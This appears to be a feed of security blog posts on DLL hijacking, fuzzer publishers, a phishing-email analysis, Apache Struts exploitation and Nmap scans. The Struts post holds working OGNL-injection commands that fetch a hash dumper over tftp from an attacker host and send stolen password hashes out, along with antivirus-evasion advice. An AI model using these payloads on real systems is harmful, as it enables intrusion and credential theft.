Quantcast
Channel: Open Security Research
Viewing all 107 articles
Browse latest View live

Unsafe DLL Loading Vulnerabilities

$
0
0
By Muralidharan Vadivel.

A common issue we see in applications is the order in which they import DLLs at runtime. This is referred to as a Load Order Vulnerability that can result in local privilege escalation. It became popular a few years ago after the release of a Microsoft Advisory for a number of Microsoft products. In this blog post we'll dissect the vulnerability, exploitation scenarios, and how to fix it.

First let us try to understand the two different types of unsafe DLL loading vulnerabilities i.e. DLL hijacking and Component Resolution Failure:

What is DLL Hijacking?

A Microsoft article explains it as “When an application dynamically loads a dynamic-link library without specifying a fully qualified path name, Windows attempts to locate the DLL by searching a well-defined set of directories in a particular order, as described in Dynamic-Link Library Search Order. If an attacker gains control of one of the directories on the DLL search path, it can place a malicious copy of the DLL in that directory. This is sometimes called a DLL preloading attack or a binary planting attack. If the system does not find a legitimate copy of the DLL before it searches the compromised directory, it loads the malicious DLL. If the application is running with administrator privileges, the attacker may succeed in local privilege elevation”

In simple terms if an application (e.g. Test.exe) loads a DLL (e,g. foo.dll) by just the name, Windows follows a specific search order depending upon whether “SafeDllSearchMode” is enabled or disabled to locate the legitimate DLL. If an attacker has knowledge of this application, he can place a malicious DLL in its search path with the same name as the legitimate DLL forcing the application to load the malicious DLL, thus leading to remote code execution. SafeDLLSearchMode places the user’s current working directory later in the search order.

Assuming that SafeDllSearchmode is enabled, system searches the directories in the following order:

  1. The directory from which the application loaded.
  2. System directory (C:\Windows\System32).
  3. The 16-bit system directory (C:\Windows\System).
  4. The Windows directory (C:\Windows).
  5. The Current Directory.
  6. Directories that are listed in the PATH variables.


This issue had not been considered a serious threat because it requires local file system access on the victim’s host for successful exploitation. Following section describes some of the realistic attack scenarios:

  1. Combining carpet bombing with unsafe DLL loading: When the victim visits a malicious web page, attackers can make the browser automatically download arbitrary files. This is referred to as Carpet bomb attack. This flaw leads to remote code execution if the vulnerable application checks in the desktop directory first for resolving the DLL. For example, Safari Web Browser was vulnerable to carpet bomb attack. Internet explorer 7 loads sqmapi.dll when it runs, suppose this DLL gets downloaded in the victim’s desktop directory by a carpet bomb attack IE7 loads the malicious DLL and executes arbitrary code.
  2. Sending the victim an archive file containing the shortcut to vulnerable application along with the malicious DLL . Since many vulnerable applications resolve the missing DLL in the startup directory this can be used to load up the malicious DLL upon clicking the shortcut to the vulnerable application. This can also be combined with carpet bombing attack.
  3. Opening a document can load certain files placed in the same directory as the document. Attacker can send an archive containing the document along with a malicious DLL to exploit this kind of behavior.


Component Resolution Failure

This occurs when an application fails to resolve a DLL because the DLL does not exist in the specified path or search directories. If this happens, a malicious Dll with the same name can be placed in the specified path directory leading to remote code execution.

Identifying Load Order Issues

We can identify these issues with the help of process monitor. To use process monitor to examine unsafe DLL loading issues:

  1. Start process monitor
  2. Include the following filters
    • Process Name begins with “Name of the process”
    • Operation is CreateFile
    • Operation is LoadImage
    • Path ends with dll
    • Result is Name Not Found
  3. Exclude the following filters
    • Process Name begins with “Name of the process”
    • Operation is RegQueryValue
    • Operation is RegOpenKey

  4. Start your application and observe process monitor output, look out for dll’s that are being searched for in the current directory, system directory etc. There is a good chance that these Dll’s could be vulnerable. Also identify DLL’s that are not present in the specified directory, this can lead to component resolution failure issue.

  5. Download wab32res.dll from http://www.binaryplanting.com/demo/windows_address_book/
  6. Rename this DLL to one of the Vulnerable one’s identified in step 4 and place them in the appropriate folder
  7. Restart the Vulnerable application and observe if wab32res.dll gets loaded by the application

Fixes

  1. Wherever possible, specify a fully qualified path when using the LoadLibrary, LoadLibraryEx, CreateProcess or ShellExecute functions.
  2. Consider using DLL redirection or manifest to ensure that your application uses the correct DLL
  3. When using the standard search order, make sure that safe DLL search mode is enabled. This places the user's current directory later in the search order, increasing the chances that Windows will find a legitimate copy of the DLL before a malicious copy
  4. Consider removing the current directory from the standard search path by calling SetDllDirectory with an empty string (""). This should be done once early in process initialization, not before and after calls to LoadLibrary. Be aware that SetDllDirectory affects the entire process and that multiple threads calling SetDllDirectory with different values can cause undefined behavior. If your application loads third-party DLLs, test carefully to identify any incompatibilities
  5. Do not use the SearchPath function to retrieve a path to a DLL for a subsequent LoadLibrary call unless safe process search mode is enabled

Creating Custom Peach Fuzzer Publishers

$
0
0
by Brad Antoniewicz.

Peach is arguably the most established, freely available fuzzer out there. It has tons of built in functionality to support a huge range of features. While you can data model even the most complex protocols, you can only go so far with a PeachPit before you realize that you just need a custom publisher. In this blog post we'll show how to write and compile a custom publisher so you can spend all your CPU cycles fuzzing the stuff that matters.

When Is It Time?

Since you can do so much with a DataModel and a StateModel, identifying when it's time to transition from a PeachPit to a custom publisher can be tough. To me, it all depends on what you're looking to fuzz. The most common case is your target protocol or file format has multiple levels of encapsulation. Sure, you could easily DataModel this encapsulation, but then you're stuck manually excluding higher level encapsulated data. And in some cases, the encapsulation creates a situation that the DataModel just can't handle.

Here's a sort interesting example I've recently come across. The application implemented it own custom protocol within a TLS tunnel. The tricky part here is that it was all over UDP. So there had to be another layer of encapsulation (XYZ Proto) above TLS but below UDP to keep state of the TLS tunnel, since UDP is stateless. Here's what the encapsulation looked like from a high level:



Now if we're just looking to fuzz XYZ Proto then a DataModel here using the UDP Publisher would do just fine. However, since we're looking to fuzz Custom Protocol, we have a bit of work to do. Establishing a TLS tunnel is beyond the purpose of the DataModel - and the only way for us to get at the important part, is to buld a custom publisher.

If you're just dealing with file formats, this same idea still applies, but its more likely you can build out the DataModel for the entire file format, rather then hitting the TLS brick wall. That being said, it might not be necessary to build the DataModel for the higher level file formats if a custom publisher can be written.

Compiling Peach

Technically, you don't have to compile Peach from source. A little later on I'll walk you through compiling your custom Publisher without the entire Peach source code. But the reality is that when you're building your Publisher, you'll need to look at the source of other Publishers to get better understanding of how everything works, so you might as well learn to build everything from source anyway.

Download the source package from Peach's sourceforge page. I'd recommend downloading the latest Beta source code, rather then the stable source so that you can take advantage of bug fixes, etc..



To compile from source is as simple as it gets due to a handy install script:

root@kali:~/peach-3.1.53-source# ./waf configure
root@kali:~/peach-3.1.53-source# ./waf build
root@kali:~/peach-3.1.53-source# ./waf install


Peach will install the compiled binaries into output/linux_x86_release/bin and output/linux_x86_debug/bin.

Publisher Structure

Publishers are located within the Peach.Core/Publishers directory of the source package. There are a number available for you to use a reference. Basically every publisher inherits from the Publisher class (Peach.Core/Publisher.cs) and should override a few key functions that are tied back to the corresponding Action Types referenced in the PeachPit. The following table provides a summary of those functions (all are of type protected virtual void unless otherwise noted and descriptions are from the Publisher.cs source)

FunctionDescription
OnStart()Called when the publisher is started. This method will be called once per fuzzing "Session", not on every iteration.
OnStop()Called when the publisher is stopped. This method will be called once per fuzzing "Session", not on every iteration.
OnOpen()Open or connect to a resource. Will be called automatically if not called specifically.
OnClose()Close a resource. Will be called automatically when state model exists. Can also be called explicitly when needed.
OnAccept()Accept an incoming connection.
OnInput()Read data
OnOutput(BitwiseStream data)Send data
protected virtual Variant OnCall(string method, List args)Call a method on the Publishers resource
OnSetProperty(string property, Variant value)Set a property on the Publishers resource.
protected virtual Variant OnGetProperty(string property)Get value of a property exposed by Publishers resource


Depending on the purpose of the Publisher, some of the above functions are more important then others. For instance, if we're only concerned with modifying the output of data right before its sent, then we'd just override OnOutput().

Getting Started

From here on out we'll demonstrate everything else you need to get started by building a simple example that adds a layer of encapsulation within the UDP protocol. This example would be trivial to add to a DataModel, but for the sake of this example, we'll implement it in a Publisher.

First up we'll start out by making a copy of the UdpPublisher which extends the SocketPublisher class:

root@kali:~/peach-3.1.53-source/Peach.Core/Publishers# cp UdpPublisher.cs MyCustomPublisher.cs


We'll set the name for our Publisher that will be referenced in the PeachPit by replacing "Udp" with "MyCustomPublisher on line 35:

[Publisher("MyCustomPublisher", true)]


And name the class of our publisher by replacing "UdpPublisher" with "MyCustomPublisher" on line 43:

 public class MyCustomPublisher: SocketPublisher


and line 49:

 public MyCustomPublisher(Dictionary%lt;string, Variant> args


And that's it! We have our custom publisher all done! Granted, its really a waste at this point since its exactly the same thing as the UdpPublisher, but nonetheless it's still custom :)

Extending Functionality

To make this example a little more interesting, lets add that layer of encapsulation, something like this:



Here we care about fuzzing Custom, but not ABC Proto. So we'd create a custom Publisher to handle ABC Proto and a DataModel for fuzzing Custom. Let's say ABC Proto is structured this way:



First thing we'll need to do in our new Publisher is override the OnOutput function so that we can modify the data before its sent. So we'll add a new line after line 72 and insert:

protected override void OnOutput(BitwiseStream data)
{

}


Now comes our program body, we'll need to build a new packet with the ABC Proto's header and length fields. Header is a 2 byte static value of 1234, and length is a 2 byte value for the length of the data field in network byte order. Since the length field is only 2 bytes, we first need to put in some intelligence that ensures the length of data does not exceed the maximum value of that field.

int totalPktLen = (int)data.Length + 4;

if (totalPktLen > 65535) {
Logger.Debug("ABC Proto Max Packet Length Reached, capping at 65535");
totalPktLen = 65535;
}

if ( totalPktLen <= 0 ) {
Logger.Debug("ABC Proto Min PacketLength Reached, just setting to 4 to account for header and length fields");
totalPktLen = 4;
}


This can be an controversial move and its an important note to make about custom publishers. Our intention is to fuzz the heck out of Custom Protocol and as part of that fuzzing, we should be trying really long strings and other values. By implementing this limitation we are effectively limiting our test cases. It might be worthwhile just to forget about an accurate value in the ABC Proto Length field as it might lead to more vulnerabilities.

That being said, let's leave that option up to the end user of the publisher. We'll do that via a parameter that we'll implement a little further down below.

Next we'll create our ABC Proto Start Header which is just a constant 1234:

byte[] abcProtoHdr = { 0x12, 0x34 } ;


Our final product will be a buffer containing the original data packet encapsulated within ABC Proto, so here we'll create that buffer:

var buffer = new byte[totalPktLen];


Now we'll build our packet by first copying the ABC Proto Header into the buffer:

Array.Copy(abcProtoHdr, 0, buffer, 0, abcProtoHdr.Length);


Next we'll handle the length field. It needs to be in network bit order, so we'll do with Array.Reverse() after we copy it to the output buffer:

Array.Copy(BitConverter.GetBytes(totalPktLen - 4), 0, buffer, abcProtoHdr.Length, sizeof(ushort));
Array.Reverse(buffer, abcProtoHdr.Length, sizeof(ushort));


To wrap up the buffer we'll just copy over the original data:

data.Read(buffer, abcProtoHdr.Length + sizeof(ushort), buffer.Length - 4);


At this point we've built-in that ABC Proto layer of encapsulation, since that's all we really needed to do, we can pass that data to the original OnOutput() function that SocketPublisher implements to send:

base.OnOutput(new BitStream(buffer));


Passing Parameters

Ok back to that ABC Proto Length issue we ran into earlier on. We could either restrict the data length and limit our fuzzing or just ignore it. The best approach might be to allow the user make that decision via a Parameter passed to the publisher. To do this we'll need to create a new parameter by inserting a new line after line 51 and providing:

[Parameter("StrictLength", typeof(bool), "Enforce the ABC Proto Length Restrictions (may limit fuzz cases)", "true")]


Here we have StrictLength as a boolean option, set to true by default. Next we'll need to create local variable for it by inserting a new line after line 62:

public bool StrictLength { get; set; }


And now we can wrap our length adjustment code into an if statement:

 if (StrictLength) {
if (totalPktLen > 65535) {
Logger.Debug("ABC Proto Max Packet Length Reached, capping at 65535");
totalPktLen = 65535;
}

if ( totalPktLen <= 0 ) {
Logger.Debug("ABC Proto Min PacketLength Reached, just setting to 4 to account for header and length fields");
totalPktLen = 4;
}
}


Alright! Our custom ABC Proto publisher is written! On to compiling..

Compiling with dmcs

We could recompile the entire Peach source code as per the instructions above, or using a standard Peach binary release, we can save time by compiling only our new custom publisher. Peach runs on Linux with the help of the mono framework which allows .Net applications to run on a number of different platforms. The dmcs utility is a compiler within mono which we'll use on our Kali installation.

Enter the peach binary release directory with your MyCustomPublisher.cs copied into it, and compile with:

 dmcs MyCustomPublisher.cs -out:MyCustomPublisher.dll -target:library -r:Peach.Core.dll,NLog.dll


If all went well, you should should have a MyCustomPublisher.dll!

Calling from the PeachPit

The last thing we need to do is call our custom publisher from a PeachPit via the <Publisher> tag within our Test definition:

<Test name="Default">
<StateModel ref="CustomProtocolOutput"/>

<Publisher class="MyCustomPublisher">
<Param name="Host" value="192.168.1.1"/>
<Param name="Port" value="12345"/>
</Publisher>
</Test>


The full PeachPit for this project can be found here.

Testing with Wireshark

We'll run a single instance of our fuzz case and use Wireshark to inspect output on the wire:

 root@kali:~/peach-3.1.53-linux-x86-release# mono peach.exe MyCustomPublisherDataModel.xml -1

[[ Peach v3.1.53.0
[[ Copyright (c) Michael Eddington

[*] Test 'Default' starting with random seed 5136.

[R1,-,-] Performing iteration

[*] Test 'Default' finished.


Now Wireshark doesn't have have a plug-in to parse for our ABC Proto (WTH wireshark dev team?!) - but if we look at the raw data we can see our ABC Proto header, length fields, and included within the data is the content of our DataModel.



Source Code

If you'd like to reference the source code for this project, head over to Github:



Got any tips for creating publishers? Share below in the comments!



Y U Phish Me? [Part 1]

$
0
0
By Melissa Augustine.

Some emails have been censored for your protection :)

A few days ago while I was browsing my inbox, I came across an interesting email from "Paypal" with the subject of "Help Centre!". Something didn't look right. Here's the Email:



I was a bit suspicious of this, but at first blush it looked pretty OK. Then I looked at the email header:



support@paypal.com via shepard.sypherz.com? I'm pretty sure Paypal hasn't decided to send email through a third party, something is odd here.

SMTP Header

Lets take a look more into the header. You can click on the down arrow (near the "Reply" button on the new Gmail interface and click 'Show Original') to see the full header.

When analyzing SMTP Header data you start at the bottom (1st action) and work up to the time (most recent action):



Let's dig into each of the numbered areas of this header:

  1. This section shows the actual sending of the email from shepard.sypherz.com. Postfix is an open source mail agent. Also note the time and date, January 11, 2014 09:5501 (-0600). This gives us an idea of the timezone of the offending server and we can do some DNS lookups to try and find anything interesting about it.
  2. Here we see something about 'authentication results' and an SPF string. SPF stands for Sender Policy Framework and was meant to detect spam and spoofing. It did this by verifying the senders IP address.

    From Wikipedia:
    "SPF allows administrators to specify which hosts are allowed to send mail from a given domain by creating a specific SPF record (or TXT record) in the Domain Name System (DNS)".

    So basically if I am trying to relay mail through a non-authorized IP and SPF is enabled, it would be blocked. We see here though the IP address 95.211.6.133 (www-data@shepard.sypherz.com, another domain name) was vouched by its DNS. Well that’s nice. We can do an nslookup to see what we can about that IP:



    This looks like a potential NL IP? Geo-IP confirms this.



  3. Next we see it getting handed over to google.com. We see another server name which we saw earlier with nslookup, nexus.sypherz.com. The time here is 07:55:03 -0800 (PST). This is the time zone for Mountain View, CA
  4. We then see it bouncing around Google (its 10.x.x.x which means its internal servers)


Ok, so what that means is... well, its not from Paypal at all :)

Email Addresses

I can also see (just take my word for it) that there are a decent amount of email addresses in here. I copy and paste them out to a text file, but they are not on one per line so its hard for me to do much with it (I like order). Vim provided a great solution:

/[ ]
:%s//\r&/g


The above code is two separate commands run within vim. The first one searches for whatever is in the square brackets, in our case, a space. The 2nd says to search (/s) and replace the space (if you put nothing in here it takes the last search) in every instance (the %) with a carriage return (r&). If that doesn't make sense, look here. I still had to go through and fix a few email addresses up (I think it was due to just addresses hitting the edge and continuing on the next line), but in the end, a lot less work than doing it all by hand!

Now that that’s done, lets see what we got.

$wc -l address.txt
>> 2887 adress.txt

$ sort address.txt | uniq address.txt > uniqaddress.txt
$ wc -l uniqaddress.txt
>> 2887 uniqaddress.txt



So all unique addresses, and looked like it was part of a larger list. I say this because it started with m’s and ended at z’s and the list pre-edited looked sorted already.

Domains

Ok great, let’s scroll down the original text to view the message body. You can see the HTML here

Looking at it, it’s hard to see what you are looking for, but let's focus on domains again. I'll copy out the body and save as a file (body.txt). Next some command line magic to pull out all domains with "http".

$ grep -E -o "http://[a-zA-Z0-9.-_]+" body.txt 
>> http://images.paypal.com/en_US/i/logo/logo_emailheader_113wx46h.gif
>> http://images.paypal.com/en_US/i/scr/pixel.gif
>> http://images.paypal.com/en_US/i/scr/scr_emailTopCorners_580wx13h.gif
>> http://images.paypal.com/en_US/i/scr/pixel.gif
>> http://hoabinhltd.com/
>> http://images.paypal.com/en_US/i/scr/pixel.gif
>> http://images.paypal.com/en_US/i/scr/scr_emailBottomCorners_580wx13h.gif
$ grep -c http body.txt
>> 6




Whew! Let’s go through the 1st grep shall we?

  • grep - pretty obvious, invokes the command grep
  • -E - this will interpret the pattern as an Extended regular expression
  • -o - prints only the matching part of the line (not the whole line which is default)
  • “[stuff]” - this is our regex
    • http:// - find me anything with ‘http://
    • [a-zA-Z0-9.-_]+ - in addition, find me one or more (that’s the +) instances of alphanumeric characters (upper and lower), a ‘-‘, or a dot ‘.


I ran the last grep to make sure I didn't miss anything. I see a discrepancy, the count gave me 6 but the regular expression gave me 7... what gives? Well if you look at the man page for grep you see that it counts the lines where the expression was found. So... this means http was found twice on one line. I could have also piped another grep to remove the paypal with the -v option. You can also look for https domains with this as well!

$ grep -E -o "http://[a-zA-Z0-9.-_]+" body.txt | grep -v paypal



Sweet I found instantly a domain I may want to focus on! We can search in vim for the domain to get more context as to when that domain was called.

<td><span style="color: rgb(8, 68, 130); outline-width: 0px;"<p>Click Update to Confirm Your Account Now <a href="http://hoabinhltd.com/" target=_blank>  update</a></td>



Well this definitely looks like what I would call the suspicious domain! CentralOps provides some information about the domain:



..and we can use Geo-IP as well:



So this is looking like a classic phishing campaign… what happens if we go to this domain? Tune in next time, same blog time… same blog channel!

Y U Phish Me? [Part 2]

$
0
0
By Melissa Augustine.

In the last blog post we had done some research on a spear phishing email I received. We used vim and regex to make our lives a bit easier for analysis purposes and we have extracted a suspicious URL.

What’s left to do… well, go to the URL of course!

Paros Proxy

For this instance I am using Paros Proxy, but please my no means assume that is the proxy you must use. There are quite a few proxies out there so use whichever one you are comfortable with. Don’t forget to modify your browser settings to the proxy port so you don’t miss any traffic!

There is a spiffy basic howto for using Paros here.

For this exercise, I want to ensure that I am capturing both requests and responses. This means everytime I send a request from my web browser, or recieve a response from the server, Paros will catch it and allow me to decide to pass or drop the traffic.

All right lets go! Simply enter our suspicious domain hxxp://hoabinhltd.com in the browser and click pass in Paros to see what we get back:

 HTTP/1.1 302 Moved Temporarily
Date: Mon, 13 Jan 2014 23:58:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Location: http://www.cieneguilla.com/.www.paypal.com/.Update/
Content-Length: 0
Connection: close
Content-Type: text/html



Well then! It looks like we have a redirect here! This is taking us to cieneguilla.com. We know malicious actors like to give us analysts (and our detection devices) a hard time by doing things like this… thanks! It’s also interesting that we can see the server type (Apache) and web server type (PHP version 5.2) Ok, now we need to pass through paros the new GET request.

nslookup

Let’s get some information on this new domain, cieneguilla.com.

 $nslookup cieneguilla.com

Non-authoritative answer:
Name: cieneguilla.com
Address: 66.225.230.234



From CentralOps.net:

 Queried whois.networksolutions.com with "cieneguilla.com"...
Domain Name: CIENEGUILLA.COM
Registry Domain ID:
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://www.networksolutions.com/en_US/
Updated Date: 2012-04-12T00:00:00Z
Creation Date: 2007-04-29T00:00:00Z
Registrar Registration Expiration Date: 2014-04-27T00:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: 1-800-333-7680
Reseller:
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: Huanca, Italo
Registrant Organization: PUBLITOUR
Registrant Street: Av. San Martin Zona D LtD-15, Cieneguilla
Registrant City: Lima
Registrant State/Province: Lima
Registrant Postal Code: Lima 40
Registrant Country: PE



Following the HTTP Session

We get a few more redirects, but we eventually get to some web content for us to view. What I found interesting about the different responses received (different technologies, different content-types).

 HTTP/1.1 302 Moved Temporarily
Date: Mon, 13 Jan 2014 23:58:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
location: cf5de2ce4e96c1b32c29ab46a8e8eaa6
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html



And another:

 HTTP/1.1 301 Moved Permanently
Date: Mon, 13 Jan 2014 23:59:17 GMT
Server: Apache
Location: http://www.cieneguilla.com/.www.paypal.com/.Update/cf5de2ce4e96c1b32c29ab46a8e8eaa6/
Vary: Accept-Encoding
Content-Length: 292
Content-Type: text/html; charset=iso-8859-1



Here's what the final page looks like rendered:



What we are presented with is a PayPal login. It looks a bit lacking on the content side, no HTTPS is enabled (most sites have you in a secure session during log in… or at least I hope so), and its quite obvious that the URL is not PayPal. Nevertheless, lets put in some data and see what happens. Paros stops the post request.



Well it looks like PHP (Snd1.php) is being passed my login parameters. So now these nice people have poor Rick Suave’s PayPal information. Looking at the tabs/address bar you see they even use the Paypal logo (but not not try to hide the domain name difference) in an attempt to trick the user into believing they are interacting with PayPal.

I also notice the long alphanumeric string in the domain name changes everytime I visit the page. This must be my unique identifier. I ran it against HashID and it guessed it to be an MD5 hash.



I bet everyone can figure out what happens next… Here is Rico’s address and credit card information (not even verified by the server to be a valid credit card number).

Here's the web page asking for address:



And Paros catching the request:



The web page next asks for the card info:



And Paros catching the request:



After all of this, the site kindly redirects you to the real PayPal. If you still have Paros running at this point, you get some certificate issues because the REAL PayPal establishes an SSL connection and Paros uses its own certificate so it can see inside HTTPS traffic:



 root@bt:~# 


This was an example of a classic phishing campaign. Sometimes these actors like to throw some malware at you just to ensure they ensnare you, however this one was a simple harvester.

Attacking Struts with CVE-2013-2251

$
0
0
By Mike McGilvray.

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications. It favors convention over configuration, is extensible using a plugin architecture, and ships with plugins to support REST, AJAX and JSON.

Would-be attackers target Apache Struts because of its popularity among web developers. A search for the term ‘struts’ on The National Vulnerability Database indicates that there were ten vulnerabilities related to Apache Struts in 2013 with seven of them rated as High. In addition, exploit code is in circulation in the wild and publicly available in attack frameworks such as Core Impact and Metasploit.

Finding Struts

You can perform initial discovery using nmap by probing the IP address space specifically for TCP port 8080 which is the default port for a variety of applications such as Apache Tomcat Manager and JBoss. Use the following command:

 root@kali:~# nmap -PN -iL iplist.txt -p 8080 -oG 8080.txt


This produces the output file 8080.txt which must then be parsed to produce a list of potential targets. Use the following command to parse:
 root@kali:~# cat 8080.txt | grep open | cut -d "" -f2 >> potential.txt


The resulting output can then be used in conjunction with the curl command to query potential targets for /struts2-blank/example/HelloWorld.action. If a 200 OK response is received then the IP address is written to an output file. I like to automate this with the following struts.sh shell script:

 #!/bin/bash
STR="200"
for i in `cat potential.txt`
do echo Testing IP Address $i -----
curl -I http:$i:8080/struts2-blank/example/HelloWorld.action -s | grep $STR
if [ $? == 0 ]
then
echo "Apache Struts found, writing IP to struts.txt…"
echo $i >> struts.txt
fi
done



In this example the target address space just has one host, 10.1.1.206 in the resulting struts.txt:


CVE-2013-2251 Pwnage

Now that we know struts is running we can begin to focus in on specific vulnerabilities. For this post we will be focusing on CVE-2013-2251.

CVE Number: CVE-2013-2251
Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability
Affected Software: Apache Struts v2.0.0 - 2.3.15
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status: v2.3.15.1 was released which fixes this vulnerability

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

Normal redirect prefix usage in JSP:

<s:form action="foo">
...
<s:submit value="Register"/>
<s:submit name="redirect:http://www.google.com/" value="Cancel"/>
</s:form>



If the cancel button is clicked, redirection is performed.

Request URI for redirection: /foo.action?redirect:http://www.google.com/

Manual validation can be achieved by using a simple expression in the URI:
 http://10.1.1.206:8080/struts2-blank/example/X.action?action:%25{3*4}


Using Metasploit

Metasploit has an struts_default_action_mapper module which makes attacking vulnerable struts targets easy.

 Command: msf > use exploit/multi/http/struts_default_action_mapper
Command: msf > set RHOST 10.1.1.206
Command: msf > set PAYLOAD windows/meterpreter/reverse_tcp
Command: msf > exploit



Metasploit identifies the target system as Windows, sets up a local server that offers up the payload and waits for the victim to request the payload.



With a meterpreter shell, you can gain full control over the system:

 Command: meterpreter > getuid
Output: Server username: NT AUTHORITY\SYSTEM

Command: meterpreter > getprivs
Command: meterpreter > hashdump
Output:
Jack:500:aad3b435b51404eeaad3b435b51404ee:2729b27b06359694b3da9aa658be9c1e:::



Manual Exploitation

While frameworks like Metasploit are feature rich their popularity usually means that they are more likely to be detected. Payload generators like AV0id and Veil can be utilized but again, popularity inevitably results in detection. Targeted customized manual attacks are more likely to succeed without detection.

Executing ipconfig

You can use cmd.exe on the target system to execute ipconfig and confirm that the attack permits interaction with the underlying operating system.

 http://10.1.1.206:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20ipconfig.exe%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29} 



The above command will store the output to a file named ipconfig.action on the local system. You can read it using cat:



Uploading Files

Here I'll upload a password hash dumper , gsecdumpv2b5.exe. (note: I always modify my uploads so that it was fully undetectable (FUD) by antivirus to avoid detection - perhaps that’s another blog post!)

To upload:

 http://10.1.1.206:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20tftp.exe%20-i%2010.1.1.111%20get%20gsecv2b5.exe%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}



Executing and Write Output

After we run gsecv2b5.exe it will output the results to a file called hashes.txt.

 http://10.1.1.206:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20gsecv2b5.exe%20-a%20%3E%3E%20hashes.txt%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}



Downloading Files

To download hashes.txt:

 http://10.1.1.206:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20tftp.exe%20-i%2010.1.1.111%20put%20hashes.txt%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}



And just to check it out:

 root@kali:~# cat hashes.txt
Output: Jack(current):500:aad3b435b51404eeaad3b435b51404ee:2729b27b06359694b3da9aa658be9c1e:::



You're Up!

From here you will have to use your imagination on how to expand influence through the network! If you’re interested in just how popular this attack is with Chinese hackers then just Google the phrase “struts2-blank/example/X.action?redirect”.

What's Really Open? Nmap Tips for an Accurate Port List

$
0
0
by Josh Bealey

Anyone who has done lots of port scanning over the internet will know that Nmap often identifies certain ports as filtered. In this blog post, we'll look at alternative scans that can help truly identify the state of a particular port.

Filtered State

Before we continue, let's just hit on what filtered actually is. Nmap's man page gives us details:

Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed.

And just for completeness, there is also open|filtered so let's just see that description:

Nmap reports the state combinations open|filtered and closed|filtered when it cannot determine which of the two states describe a port. The port table may also include software version details when version detection has been requested.

So let's say we've come up filtered, what can we do? Nmap has a few different types of scans and scan options that may help.

Null scan (-sN)

The Nmap Null scan (-sN) works by sending a TCP packet not having the RST, SYN or ACK bits set, which as per the TCP standard should result in a receiving packet with the RST packet set to try and reset the connection. Most firewalls will filter out these types of scans, but on occasion it can still yield results.

The format of the Null scan is:

 root@kali:~# nmap –sN –p $ports $hosts –o output.txt



FIN scan (-sF)

A similar scan to the Null scan is the FIN scan, which sets just the FIN bit in a TCP packet. Like the Null scan this should also result in a response packet with the RST bit set if sent to an open port, while a closed or filtered port should simply drop the packet.

The format of the FIN scan is:

 root@kali:~# nmap –sF –p $ports $hosts –o output.txt



Window scan (-sW)

On certain older systems, a window scan can also be used to determine if a port is open or not. The window scan works by examining the window segment of a TCP packet with the RST bit set. A window scan will consider the port as open if the window value is positive, and closed if it is negative. This scan isn’t generally reliable as most systems will simply report as closed, but as a last resort scan type it may give some direction to investigate further. If a scan shows all open ports but a few as filtered, they may actually be open.

The format of the Window scan is:

 root@kali:~# nmap –sW –p $ports $hosts –o output.txt



Timing (-T)

Another technique that can be used with Nmap is to scan very, very slowly. Using the –T parameter with Nmap, which allows you to specify the frequency with which Nmap sends packets probing for open ports. Nmap has 3 settings that are slower than just a normal scan, named paranoid, sneaky and polite. The main differences between these are the time Nmap waits between sending probes, with paranoid mode (-T0) waiting five minutes between sending each probe, and polite mode (-T2) waiting 0.4 seconds.

